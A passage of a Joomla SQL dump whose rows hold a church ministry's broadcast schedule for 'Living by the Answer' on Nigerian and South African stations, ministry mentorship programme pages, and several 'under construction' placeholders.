11.5pt; font-family: \'Arial\',sans-serif; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-fareast-language: EN-GB;\">Sat. 11:30 – 11:45am</span></p>\r\n<p class=\"MsoNormal\" style=\"line-height: normal; margin: 7.65pt 0in 7.65pt 0in;\"><span lang=\"EN-GB\" style=\"font-size: 11.5pt; font-family: \'Arial\',sans-serif; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-fareast-language: EN-GB;\">Sun. 9.45 – 10:00pm</span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 95.25pt; padding: .75pt .75pt .75pt .75pt;\" valign=\"top\" width=\"127\">\r\n<p class=\"MsoNormal\" style=\"line-height: normal; margin: 7.65pt 0in 7.65pt 0in;\"><span lang=\"EN-GB\" style=\"font-size: 11.5pt; font-family: \'Arial\',sans-serif; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-fareast-language: EN-GB;\">Omega Tv</span></p>\r\n<p class=\"MsoNormal\" style=\"line-height: normal; margin: 7.65pt 0in 7.65pt 0in;\"><span lang=\"EN-GB\" style=\"font-size: 11.5pt; font-family: \'Arial\',sans-serif; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-fareast-language: EN-GB;\">South Africa</span></p>\r\n</td>\r\n<td style=\"width: 117.0pt; padding: .75pt .75pt .75pt .75pt;\" valign=\"top\" width=\"156\">\r\n<p class=\"MsoNormal\" style=\"line-height: normal; margin: 7.65pt 0in 7.65pt 0in;\"><span lang=\"EN-GB\" style=\"font-size: 11.5pt; font-family: \'Arial\',sans-serif; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-fareast-language: EN-GB;\">Living by the Answer</span></p>\r\n</td>\r\n<td style=\"width: 85.5pt; padding: .75pt .75pt .75pt .75pt;\" valign=\"top\" width=\"114\">\r\n<p class=\"MsoNormal\" style=\"line-height: normal; margin: 7.65pt 0in 7.65pt 0in;\"><span lang=\"EN-GB\" style=\"font-size: 11.5pt; font-family: \'Arial\',sans-serif; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-fareast-language: EN-GB;\"> MyTv</span></p>\r\n</td>\r\n<td style=\"width: 135.0pt; padding: .75pt .75pt .75pt .75pt;\" valign=\"top\" width=\"180\">\r\n<p class=\"MsoNormal\" style=\"line-height: normal; margin: 7.65pt 0in 7.65pt 0in;\"><span style=\"font-size: 15.3333px;\"><strong><span style=\"color: #403b38; font-family: Arial, sans-serif;\">Normal Broadcast</span></strong></span></p>\r\n<p class=\"MsoNormal\" style=\"line-height: normal; margin: 7.65pt 0in 7.65pt 0in;\"><span style=\"color: #403b38; font-family: Arial, sans-serif;\"><span style=\"font-size: 15.3333px;\">Mon:10pm, Tue:7pm, Wed:10pm, Thurs:7pm &amp; Fri: 10pm</span></span></p>\r\n<p class=\"MsoNormal\" style=\"line-height: normal; margin: 7.65pt 0in 7.65pt 0in;\"><span style=\"font-size: 15.3333px;\"><strong><span style=\"color: #403b38; font-family: Arial, sans-serif;\">Repeat Broadcast</span></strong></span></p>\r\n<p class=\"MsoNormal\" style=\"line-height: normal; margin: 7.65pt 0in 7.65pt 0in;\"><span style=\"color: #403b38; font-family: Arial, sans-serif;\"><span style=\"font-size: 15.3333px;\">Mon: 7:30am, Tue:10:30am, Wed:11:30am, Thur: 11am, Fri: 7:30am, Sun: 8:30am &amp; 10pm</span></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 95.25pt; padding: .75pt .75pt .75pt .75pt;\" valign=\"top\" width=\"127\">\r\n<p class=\"MsoNormal\" style=\"line-height: normal; margin: 7.65pt 0in 7.65pt 0in;\"><span lang=\"EN-GB\" style=\"font-size: 11.5pt; font-family: \'Arial\',sans-serif; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-fareast-language: EN-GB;\">OSBC  TV,</span></p>\r\n<p class=\"MsoNormal\" style=\"line-height: normal; margin: 7.65pt 0in 7.65pt 0in;\"><span lang=\"EN-GB\" style=\"font-size: 11.5pt; font-family: \'Arial\',sans-serif; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-fareast-language: EN-GB;\">OSBC Radio</span></p>\r\n</td>\r\n<td style=\"width: 117.0pt; padding: .75pt .75pt .75pt .75pt;\" valign=\"top\" width=\"156\">\r\n<p class=\"MsoNormal\" style=\"line-height: normal; margin: 7.65pt 0in 7.65pt 0in;\"><span lang=\"EN-GB\" style=\"font-size: 11.5pt; font-family: \'Arial\',sans-serif; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-fareast-language: EN-GB;\">Temi Aseese</span></p>\r\n</td>\r\n<td style=\"width: 85.5pt; padding: .75pt .75pt .75pt .75pt;\" valign=\"top\" width=\"114\">\r\n<p class=\"MsoNormal\" style=\"line-height: normal; margin: 7.65pt 0in 7.65pt 0in;\"><span lang=\"EN-GB\" style=\"font-size: 11.5pt; font-family: \'Arial\',sans-serif; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-fareast-language: EN-GB;\">22 UHF</span></p>\r\n<p class=\"MsoNormal\" style=\"line-height: normal; margin: 7.65pt 0in 7.65pt 0in;\"><span lang=\"EN-GB\" style=\"font-size: 11.5pt; font-family: \'Arial\',sans-serif; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-fareast-language: EN-GB;\">104.5 FM</span></p>\r\n</td>\r\n<td style=\"width: 135.0pt; padding: .75pt .75pt .75pt .75pt;\" valign=\"top\" width=\"180\">\r\n<p class=\"MsoNormal\" style=\"line-height: normal; margin: 7.65pt 0in 7.65pt 0in;\"><span lang=\"EN-GB\" style=\"font-size: 11.5pt; font-family: \'Arial\',sans-serif; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-fareast-language: EN-GB;\">Sat: 3-3:30pm</span></p>\r\n<p class=\"MsoNormal\" style=\"line-height: normal; margin: 7.65pt 0in 7.65pt 0in;\"><span lang=\"EN-GB\" style=\"font-size: 11.5pt; font-family: \'Arial\',sans-serif; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-fareast-language: EN-GB;\">Sun: 5:05 - 5:35am</span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 95.25pt; padding: .75pt .75pt .75pt .75pt;\" valign=\"top\" width=\"127\">\r\n<p class=\"MsoNormal\" style=\"line-height: normal; margin: 7.65pt 0in 7.65pt 0in;\"><span lang=\"EN-GB\" style=\"font-size: 11.5pt; font-family: \'Arial\',sans-serif; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-fareast-language: EN-GB;\"><span style=\"color: #403b38; font-family: Arial, sans-serif;\"><span style=\"font-size: 15.3333px;\">Ajilete FM </span></span><br /></span></p>\r\n</td>\r\n<td style=\"width: 117.0pt; padding: .75pt .75pt .75pt .75pt;\" valign=\"top\" width=\"156\">\r\n<p class=\"MsoNormal\" style=\"line-height: normal; margin: 7.65pt 0in 7.65pt 0in;\"><span lang=\"EN-GB\" style=\"font-size: 11.5pt; font-family: \'Arial\',sans-serif; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-fareast-language: EN-GB;\">Living by the Answer</span></p>\r\n</td>\r\n<td style=\"width: 85.5pt; padding: .75pt .75pt .75pt .75pt;\" valign=\"top\" width=\"114\">\r\n<p class=\"MsoNormal\" style=\"line-height: normal; margin: 7.65pt 0in 7.65pt 0in;\"><span lang=\"EN-GB\" style=\"font-size: 11.5pt; font-family: \'Arial\',sans-serif; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-fareast-language: EN-GB;\"><span style=\"color: #403b38; font-family: Arial, sans-serif;\"><span style=\"font-size: 15.3333px;\">92.1 FM</span></span><br /></span></p>\r\n</td>\r\n<td style=\"width: 135.0pt; padding: .75pt .75pt .75pt .75pt;\" valign=\"top\" width=\"180\">\r\n<p class=\"MsoNormal\" style=\"line-height: normal; margin: 7.65pt 0in 7.65pt 0in;\"><span lang=\"EN-GB\" style=\"font-size: 11.5pt; font-family: \'Arial\',sans-serif; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-fareast-language: EN-GB;\"><span style=\"color: #403b38; font-family: Arial, sans-serif;\"><span style=\"font-size: 15.3333px;\">Sunday by 7:15am for Ogbomosho</span></span></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 95.25pt; padding: .75pt .75pt .75pt .75pt;\" valign=\"top\" width=\"127\">\r\n<p class=\"MsoNormal\" style=\"line-height: normal; margin: 7.65pt 0in 7.65pt 0in;\"><span lang=\"EN-GB\" style=\"font-size: 11.5pt; font-family: \'Arial\',sans-serif; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-fareast-language: EN-GB;\">Love FM</span></p>\r\n</td>\r\n<td style=\"width: 117.0pt; padding: .75pt .75pt .75pt .75pt;\" valign=\"top\" width=\"156\"> Living by the Answer</td>\r\n<td style=\"width: 85.5pt; padding: .75pt .75pt .75pt .75pt;\" valign=\"top\" width=\"114\"> 104.5 FM</td>\r\n<td style=\"width: 135.0pt; padding: .75pt .75pt .75pt .75pt;\" valign=\"top\" width=\"180\">\r\n<p class=\"MsoNormal\" style=\"margin-bottom: .0001pt; line-height: normal;\"><span lang=\"EN-GB\" style=\"font-size: 11.5pt; font-family: \'Arial\',sans-serif; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-fareast-language: EN-GB;\"><span style=\"color: #403b38; font-family: Arial, sans-serif;\"><span style=\"font-size: 15.3333px;\">Mon, Tue., Thur., Fri. and Sun. 6:30-6:45am</span></span></span></p>\r\n<p class=\"MsoNormal\" style=\"margin-bottom: .0001pt; line-height: normal;\"><span style=\"color: #403b38; font-family: Arial, sans-serif;\"><span style=\"font-size: 15.3333px;\">Wed: 5:45-6am</span></span></p>\r\n<p class=\"MsoNormal\" style=\"margin-bottom: .0001pt; line-height: normal;\"> </p>\r\n<p class=\"MsoNormal\" style=\"margin-bottom: .0001pt; line-height: normal;\"><span style=\"color: #403b38; font-family: Arial, sans-serif;\"><span style=\"font-size: 15.3333px;\">Sat. 6:00-6:15am</span></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 95.25pt; padding: .75pt .75pt .75pt .75pt;\" valign=\"top\" width=\"127\">\r\n<p class=\"MsoNormal\" style=\"line-height: normal; margin: 7.65pt 0in 7.65pt 0in;\"><span lang=\"EN-GB\" style=\"font-size: 11.5pt; font-family: \'Arial\',sans-serif; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-fareast-language: EN-GB;\">LTV Lagos</span></p>\r\n</td>\r\n<td style=\"width: 117.0pt; padding: .75pt .75pt .75pt .75pt;\" valign=\"top\" width=\"156\">\r\n<p class=\"MsoNormal\" style=\"line-height: normal; margin: 7.65pt 0in 7.65pt 0in;\"><span lang=\"EN-GB\" style=\"font-size: 11.5pt; font-family: \'Arial\',sans-serif; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-fareast-language: EN-GB;\">Living by the Answer</span></p>\r\n</td>\r\n<td style=\"width: 85.5pt; padding: .75pt .75pt .75pt .75pt;\" valign=\"top\" width=\"114\">\r\n<p class=\"MsoNormal\" style=\"line-height: normal; margin: 7.65pt 0in 7.65pt 0in;\"><span lang=\"EN-GB\" style=\"font-size: 11.5pt; font-family: \'Arial\',sans-serif; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-fareast-language: EN-GB;\">DSTV - Channel 256, </span></p>\r\n<p class=\"MsoNormal\" style=\"line-height: normal; margin: 7.65pt 0in 7.65pt 0in;\"><span lang=\"EN-GB\" style=\"font-size: 11.5pt; font-family: \'Arial\',sans-serif; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-fareast-language: EN-GB;\">Startimes - Channel 118, </span></p>\r\n<p class=\"MsoNormal\" style=\"line-height: normal; margin: 7.65pt 0in 7.65pt 0in;\"><span lang=\"EN-GB\" style=\"font-size: 11.5pt; font-family: \'Arial\',sans-serif; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-fareast-language: EN-GB;\">GOTV - Channel 90, Consat - Channel 950</span></p>\r\n</td>\r\n<td style=\"width: 135.0pt; padding: .75pt .75pt .75pt .75pt;\" valign=\"top\" width=\"180\">\r\n<p class=\"MsoNormal\" style=\"margin-bottom: .0001pt; line-height: normal;\"><span lang=\"EN-GB\" style=\"font-size: 11.5pt; font-family: \'Arial\',sans-serif; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-fareast-language: EN-GB;\"> MON-THUR (10:30pm - 11:00pm)</span></p>\r\n<p class=\"MsoNormal\" style=\"margin-bottom: .0001pt; line-height: normal;\"><span lang=\"EN-GB\" style=\"font-size: 11.5pt; font-family: \'Arial\',sans-serif; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-fareast-language: EN-GB;\">FRI (6:30pm - 7:00pm)</span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 95.25pt; padding: .75pt .75pt .75pt .75pt;\" valign=\"top\" width=\"127\">\r\n<p class=\"MsoNormal\" style=\"line-height: normal; margin: 7.65pt 0in 7.65pt 0in;\"><span lang=\"EN-GB\" style=\"font-size: 11.5pt; font-family: \'Arial\',sans-serif; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-fareast-language: EN-GB;\">TBN Africa</span></p>\r\n</td>\r\n<td style=\"width: 117.0pt; padding: .75pt .75pt .75pt .75pt;\" valign=\"top\" width=\"156\">\r\n<p class=\"MsoNormal\" style=\"line-height: normal; margin: 7.65pt 0in 7.65pt 0in;\"><span lang=\"EN-GB\" style=\"font-size: 11.5pt; font-family: \'Arial\',sans-serif; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-fareast-language: EN-GB;\">Living by the Answer</span></p>\r\n</td>\r\n<td style=\"width: 85.5pt; padding: .75pt .75pt .75pt .75pt;\" valign=\"top\" width=\"114\">\r\n<p class=\"MsoNormal\" style=\"line-height: normal; margin: 7.65pt 0in 7.65pt 0in;\"><span lang=\"EN-GB\" style=\"font-size: 11.5pt; font-family: \'Arial\',sans-serif; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-fareast-language: EN-GB;\">Channel 343 (DSTV)</span></p>\r\n</td>\r\n<td style=\"width: 135.0pt; padding: .75pt .75pt .75pt .75pt;\" valign=\"top\" width=\"180\">\r\n<p class=\"MsoNormal\" style=\"margin-bottom: .0001pt; line-height: normal;\"><span lang=\"EN-GB\" style=\"font-size: 11.5pt; font-family: \'Arial\',sans-serif; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-fareast-language: EN-GB;\"> Sundays : 2:00-2:30pm (GMT+1)</span></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p> </p>', '', 1, 37, '2012-03-30 13:37:01', 196, '', '2018-05-06 10:53:30', 196, 196, '2018-05-06 10:53:30', '2012-03-30 13:37:01', '0000-00-00 00:00:00', '{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}', '{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}', '{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}', 14, 9, '', '', 1, 7547, '{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}', 0, '*', '', ''),
(114, 339, 'Men in Ministry Mentor ship Programme', 'mimmp', '<p><img class=\"pic3d uk-align-right\" src=\"images/demo/intro.png\" alt=\"Joomla\" /></p>\r\n<ul>\r\n<li class=\"dropcap\">Are you a man (married or single)?</li>\r\n<li class=\"dropcap\">Have you perceived God’s call upon your life?</li>\r\n<li class=\"dropcap\">Are you interested in fulfilling God’s plan for your life and be a blessing to your generation?</li>\r\n<li class=\"dropcap\">If you answer to any of the questions above is yes, then Men in Ministry Mentorship Programme is designed by God for you.</li>\r\n</ul>\r\n<p class=\"dropcap\">MIMMP is a 12 – Month intensive training for leadership in life and destiny under the Mentorship of God’s servant, Rev. Olusola Areogun.</p>\r\n<p class=\"dropcap\">You can be sure that this training will help you to:</p>\r\n<ul>\r\n<li class=\"dropcap\">Attain the fullness of all that God has designed for you in life and destiny</li>\r\n<li class=\"dropcap\">Become a symbol of the regenerated man as Christ purpose it</li>\r\n<li class=\"dropcap\">Apprehend the high calling of God on your life</li>\r\n<li class=\"dropcap\">Build your spiritual your leadership qualities in ministry, marriage, business and life generally</li>\r\n<li class=\"dropcap\">Function in your God-ordained roles in life and destiny.</li>\r\n</ul>\r\n<p class=\"dropcap\">MIMMP now holds on the 1st Saturday of every month (8am – 4pm). </p>\r\n<p class=\"dropcap\">Registration for the new set commence January of every year!</p>\r\n<p class=\"dropcap\">DON’T MISS YOUR OPPORTUNITY FOR THIS TRAINING OF A LIFETIME!</p>', '', 1, 37, '2012-03-30 13:37:01', 196, '', '2016-12-21 13:31:04', 196, 0, '0000-00-00 00:00:00', '2012-03-30 13:37:01', '0000-00-00 00:00:00', '{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}', '{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}', '{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}', 2, 8, '', '', 1, 573, '{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}', 0, '*', '', ''),
(115, 340, 'Women in Ministry Mentor ship Programme', 'wimmp', '<p><img class=\"pic3d uk-align-right\" src=\"images/demo/intro.png\" alt=\"Joomla\" /></p>\r\n<ul>\r\n<li>Are you a woman (single or married)?</li>\r\n<li>Are you born again?</li>\r\n<li>Have you perceived God’s call upon your life?</li>\r\n<li>Are you interested in fulfilling God’s plan for your life and be a blessing to your generation?</li>\r\n<li>Do you want to be equipped for it?</li>\r\n<li>If your answer is yes, then</li>\r\n</ul>\r\n<p><strong>WOMEN IN MINISTRY MENTORSHIP PROGRAMME is designed by God for you.</strong></p>\r\n<p>THE VISION</p>\r\n<p>To equip women with God’s call to fulfil God’s purpose in life and destiny and still excel martially, career wise, socially, financially, physically, mentally and in every way. It is for both married women and single ladies. No age barrier, marital condition is no limitation; widows, divorcees, polygamists, single mothers are all welcome.</p>\r\n<p><strong>FEATURES</strong></p>\r\n<ul>\r\n<li>22 exciting courses that will prepare and equip you for destiny.</li>\r\n<li>Courses taught by Rev. (Mrs.) Oyenike Areogun and other anointed men and women of God.</li>\r\n<li>Watching women ministries from across the world.</li>\r\n<li>Question and Answer Sessions.</li>\r\n<li>Practical sessions with opportunity for ministry.</li>\r\n<li>Time: 8:00am – 4pm (Every 1st   Saturday of the month).</li>\r\n<li>Duration: 12months</li>\r\n</ul>', '', 1, 37, '2012-03-30 13:37:01', 196, '', '2016-12-21 13:34:28', 196, 0, '0000-00-00 00:00:00', '2012-03-30 13:37:01', '0000-00-00 00:00:00', '{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}', '{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}', '{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}', 3, 7, '', '', 1, 543, '{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}', 0, '*', '', ''),
(116, 341, 'Anointed Family Heads', 'afh', '<p>UNDER CONSTRUCTION</p>', '', 1, 37, '2012-03-30 13:37:01', 196, '', '2016-12-21 13:37:34', 196, 0, '0000-00-00 00:00:00', '2012-03-30 13:37:01', '0000-00-00 00:00:00', '{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}', '{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}', '{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}', 4, 6, '', '', 1, 450, '{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}', 0, '*', '', ''),
(117, 342, 'Young Achievers', 'ya', '<p>UNDER CONSTRUCTION</p>', '', 1, 37, '2012-03-30 13:37:01', 196, '', '2016-12-21 13:36:07', 196, 0, '0000-00-00 00:00:00', '2012-03-30 13:37:01', '0000-00-00 00:00:00', '{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}', '{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}', '{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}', 3, 5, '', '', 1, 241, '{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}', 0, '*', '', ''),
(118, 343, 'Daughters of Destiny', 'dod', '<p>UNDER CONSTRUCTION</p>', '', 1, 37, '2012-03-30 13:37:01', 196, '', '2016-12-21 13:36:49', 196, 0, '0000-00-00 00:00:00', '2012-03-30 13:37:01', '0000-00-00 00:00:00', '{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}', '{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}', '{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}', 4, 4, '', '', 1, 248, '{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}', 0, '*', '', ''),
(119, 344, 'Happily Married Women', 'hmw', '<p>UNDER CONSTRUCTION</p>', '', 1, 37, '2012-03-30 13:37:01', 196, '', '2016-12-21 13:37:21', 196, 0, '0000-00-00 00:00:00', '2012-03-30 13:37:01', '0000-00-00 00:00:00', '{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}', '{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}', '{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}', 2, 3, '', '', 1, 291, '{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}', 0, '*', '', ''),
(120, 345, 'Teens in Destiny', 'teens-in-destiny', '<p>UNDER CONSTRUCTION</p>', '', 1, 37, '2012-03-30 13:37:01', 196, '', '2016-12-31 17:12:06', 196, 0, '0000-00-00 00:00:00', '2012-03-30 13:37:01', '0000-00-00 00:00:00', '{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}', '{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}', 